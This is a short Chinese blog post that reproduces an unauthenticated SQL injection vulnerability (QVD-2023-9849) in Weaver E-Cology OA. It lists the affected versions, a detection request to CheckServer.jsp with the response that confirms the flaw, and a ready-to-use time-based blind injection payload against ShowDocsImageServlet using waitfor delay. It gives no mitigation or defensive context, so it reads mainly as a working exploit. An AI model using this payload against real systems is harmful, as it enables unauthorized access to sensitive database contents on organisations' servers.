泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

1.漏洞描述

泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

影响版本:泛微 Ecology 9.x <= v10.56;泛微 Ecology 8.x <= v10.56

2.漏洞复现

POC

/mobile/plugin/CheckServer.jsp?type=mobileSetting

返回状态码200且参数值为{“error”;”system error”}证明漏洞存在

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现_第1张图片

进行延时注入:

/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F
0%3A0%3A10 实际上表示 0:0:10 延时10秒

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现_第2张图片

你可能感兴趣的:(sql注入,漏洞复现,web安全)